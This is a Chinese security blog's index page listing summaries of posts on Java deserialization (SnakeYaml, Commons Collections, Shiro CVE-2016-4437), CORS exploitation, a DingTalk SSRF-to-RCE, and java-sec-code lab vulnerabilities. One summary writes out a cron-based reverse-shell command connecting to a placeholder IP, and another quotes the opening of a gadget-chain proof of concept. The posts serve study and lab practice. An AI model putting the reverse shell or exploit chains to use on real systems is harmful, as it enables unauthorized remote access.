会员
众包
新闻
博问
闪存
赞助商
HarmonyOS
Chat2DB
所有博客
当前博客
我的博客
我的园子
账号设置
会员中心
简洁模式
...
退出登录
注册
登录
Erichas
博客园
首页
新随笔
联系
订阅
管理
上一页
1
2
3
4
5
6
7
下一页
2022年3月7日
关于实现order by ? 无法使用预编译
摘要: 感谢龙哥帮我写好的项目。 基于Springboot框架 ,使用mybatis来连接本地mysql数据库 进来配置好数据库名称 用户和密码 然后连接上数据库 这里用的语句是预编译的,之前说过order by这后面使用预编译是会报错的 select * from users where username
阅读全文
posted @ 2022-03-07 14:56 Erichas
阅读(867)
评论(0)
推荐(1)
2022年3月3日
Java--SnakeYaml反序列化
摘要: 0x01环境搭建 首先在maven项目的pom文件下导入yaml的依赖 这里是1.27版本的,这里的jdk我用的是11,用1.8的没成功会抛异常 来跟着写一个实例来了解一下yaml 先写一个testSnake类 然后用yaml将该类实例对象给序列化,这里用的是dump()方法 输出结果: !!意思是
阅读全文
posted @ 2022-03-03 15:46 Erichas
阅读(870)
评论(1)
推荐(0)
Java--jscmd RCE
摘要: jscmd rce 了解一下 ScriptEngineManager:是一个工厂的集合,可以通过name或者tag的方式获取某一个脚本的工厂,并且生成一个脚本的ScriptEngine. ScriptEngine engine=new ScriptEngineManager().getEngineB
阅读全文
posted @ 2022-03-03 15:44 Erichas
阅读(472)
评论(0)
推荐(0)
2022年2月21日
CORS跨域访问漏洞
摘要: 有一直在写cors漏洞,但是一直没有去真正的利用他,今天就来学习记录一下利用。 0x01前置知识 就简单提一下 Access-Control-Allow-Origin: 可以写出哪些域名能访问本站的资源 Access-Control-Allow-Credentials:字段不是必选字段,它的值是一个
阅读全文
posted @ 2022-02-21 16:26 Erichas
阅读(2339)
评论(0)
推荐(0)
2022年2月17日
反弹shell的一些东西
摘要: 反弹shell 格式问题 在写计划任务反弹shell的时候VPS如果是centos那么直接写 */1 * * * * root bash -i >& /dev/tcp/IP/666 0>&1 但是在实际测试中debian和ubuntu系统这样写是执行不了的, 需要加上 bash -c " " */1
阅读全文
posted @ 2022-02-17 10:44 Erichas
阅读(316)
评论(0)
推荐(0)
钉钉从ssrf到rce
摘要: 前几天爆出来钉钉RCE的漏洞,说一下发现和复现过程 0x01 爱之初体验 最开始是发现可以ssrf,当时电脑上就有dingding 然后试了一下 dnslog有回显,可以去访问 这两个IP一查 都是阿里云的服务器 payload是这样的,发送到聊天窗口,服务器就会去解析 dingtalk://din
阅读全文
posted @ 2022-02-17 10:18 Erichas
阅读(642)
评论(2)
推荐(0)
2022年2月11日
Java--sec-code 目录遍历&文件上传
摘要: 任意文件读取 漏洞url在: http://localhost:7869/path_traversal/vul?filepath=e:/flag.txt 可以直接访问到flag文件 来看看vul此处的代码 这里是调用getImgBase64方法 跟进这个方法 可以看到仅仅判断了改路径是否存在和不是目
阅读全文
posted @ 2022-02-11 15:47 Erichas
阅读(617)
评论(0)
推荐(0)
2022年2月10日
Java-sec-code sql注入&Velocity RCE
摘要: 先来看看这个靶场sql注入的位置 简单的一个闭合单引号就能探测出了注入 那么来看看源码 可以看到jdbc_sqli_vul函数直接传入的username就拼接到了sql中,然后取执行返回信息,没有做任何防护。 jdbc_sqli_sec 再来看看安全的查询函数 这里用到了PreparedStatem
阅读全文
posted @ 2022-02-10 17:02 Erichas
阅读(940)
评论(0)
推荐(1)
Java--new Class[]{}
摘要: 在cc1链中的poc有着这样一段 Transformer[] transformers = new Transformer[] { //通过ConstantTransformer类的transform方法获取一个对象类型 new ConstantTransformer(Runtime.class),
阅读全文
posted @ 2022-02-10 10:07 Erichas
阅读(2199)
评论(0)
推荐(0)
2022年1月12日
Java--Apache Shiro反序列化RCE--CVE-2016-4437
摘要: 0x01 漏洞环境 搭建环境: docker pull medicean/vulapps:s_shiro_1 重启docker systemctl restart docker docker run -d -p 8081:8080 medicean/vulapps:s_shiro_1 shiro框架
阅读全文
posted @ 2022-01-12 17:22 Erichas
阅读(545)
评论(0)
推荐(0)
上一页
1
2
3
4
5
6
7
下一页
公告